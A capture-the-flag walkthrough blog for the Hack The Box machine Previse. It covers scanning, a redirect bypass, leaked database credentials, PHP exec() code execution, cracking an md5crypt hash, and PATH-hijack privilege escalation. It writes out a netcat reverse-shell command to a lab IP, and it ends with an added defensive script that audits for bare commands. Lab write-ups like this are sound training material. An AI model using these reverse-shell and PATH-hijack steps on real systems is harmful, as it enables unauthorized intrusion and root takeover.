In this blog, we will cover Previse, an easy Hack The Box (HTB) machine. It is a Capture the Flag (CTF) style challenge, and you will learn a lot from it, for example about PATH variable abuse, code execution and hash cracking.
Table of Contents
Port Scanning (Nmap Tool)
Directory Scanning through Gobuster
Code Execution through PHP
Crack MD5 Hash using Hashcat
Read user.txt
Sudo Rights with PATH Variable
As always, we start with a scan of the target. Nmap is probably the best tool for network scanning. To get more information regarding the Nmap command, follow the link below.
nmap -sC -sV -oA nmap/previse 10.10.11.104
I found that port 22 (SSH) and port 80 (HTTP) are open.
Previse website Index page looks like this.
Most challenges require directory scanning at some stage. Kali Linux ships several directory scanning tools for the penetration tester. Gobuster is a popular one, and we will use it here. Let’s follow the command below.
gobuster dir --url http://10.10.11.104/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o directory.log
The gobuster scan found the /nav.php file, which doesn’t redirect to other pages. Let us open this file.
But as soon as we tried to open the /account.php page, we got redirected to login.php. We intercepted the response for /account.php using Burp Suite. Follow the image below.
Let’s change the status code from “302 Found” to “200 OK”.
Excellent, we have found the page to create an account.
Let’s create an account.
Account creation was successful.
Let’s log in with the newly created credentials.
We got a SITEBACKUP.zip file. Let’s download it.
After unzipping, we found two quite interesting files.
Surprise: I have obtained the username and password of the database. Note them down.
user = “root”
password = “mySQL_p@ssw0rd!:)”
Returning to the page source code and reviewing it for possible flaws, we found the exec() function, and it was possible to abuse it for code execution.
Let’s use Burp to intercept the request from the /logs.php page and test the code execution… Successful!
Finally, we are ready for the reverse shell. Successful!
We are inside! Let’s log in to MySQL using the credentials above. If you have no idea how to list all users in a MySQL database server, I think you should read the following blog.
We have got a username and password, but the password is stored as a hash.
We used hashcat (mode 500, md5crypt) to crack the hash with the rockyou.txt wordlist.
hashcat -a 0 -m 500 user /usr/share/wordlists/rockyou.txt
We used SSH to connect as the m4lwhere user. Login successful. We got our first flag.
Now we need to escalate our privileges. Let’s type the command: sudo -l.
Let’s analyze the /opt/scripts/access_backup.sh script. You can see that some commands/binaries are called by bare name rather than by absolute path, so the script may be vulnerable to “path injection”.
I prepended the /tmp directory to the PATH environment variable and created a “date” file there containing a netcat command that returns a reverse shell on port 9001.
echo "nc 10.10.14.4 9001 -e /bin/bash" > date
Let’s execute the following command.
We have received the reverse shell connection as root successfully!
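As an added example (not part of the original write-up), the following POSIX shell function audits a script for commands that are resolved through PATH, which is the weakness abused above, and runs it against a constructed stand-in for a sudo-run backup script and against a hardened version that pins PATH and uses absolute paths. The sample scripts, their paths and the log file names are constructed, not the machine’s real files.

```shell
#!/bin/sh
# Added example: list the external commands a shell script resolves through PATH.
# A script run via sudo that calls "date" or "gzip" by bare name can be made to run
# a same-named file from a writable directory placed first in PATH; pinning PATH
# and using absolute paths closes that hole. Prints each bare command once.
audit_bare_commands() {
    # drop comments, then split pipes, separators and subshells into one command per line
    sed -e 's/#.*$//' "$1" | tr '|;&()`' '\n\n\n\n\n\n' | awk '
      { cmd = ""
        for (i = 1; i <= NF; i++) {              # skip leading VAR=value assignments
            if ($i ~ /^[A-Za-z_][A-Za-z0-9_]*=/) continue
            cmd = $i; break
        }
        if (cmd == "" || cmd ~ /^\//) next        # empty line, or already absolute
        if (cmd ~ /^[0-9]/ || cmd ~ /[<>]/) next  # leftovers of redirections like 2>&1
        if (cmd == "[" || cmd == "]") next
        if (cmd ~ /^(if|then|elif|else|fi|for|do|done|while|until|case|esac|export|set|echo|cd|exit|return|test)$/) next
        print cmd
      }' | sort -u
}

WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT

# Constructed stand-in for a sudo-run backup script (NOT the real access_backup.sh):
# every external command is looked up through PATH.
cat > "$WORKDIR/weak.sh" <<'EOF'
#!/bin/bash
# compress today's access log
TODAY=$(date +%F)
gzip -c /var/www/file_access.log > /var/backups/access_$TODAY.gz 2>&1
EOF

# Hardened version: PATH is pinned and every external command is absolute.
cat > "$WORKDIR/hard.sh" <<'EOF'
#!/bin/bash
PATH=/usr/bin:/bin
TODAY=$(/bin/date +%F)
/bin/gzip -c /var/www/file_access.log > /var/backups/access_$TODAY.gz 2>&1
EOF

echo "weak.sh resolves through PATH:"; audit_bare_commands "$WORKDIR/weak.sh"
echo "hard.sh resolves through PATH:"; audit_bare_commands "$WORKDIR/hard.sh"
```

The weak script reports date and gzip, the hardened one reports nothing; the same check is also worth pointing at whatever sudo -l lists, since only the commands there matter for this escalation.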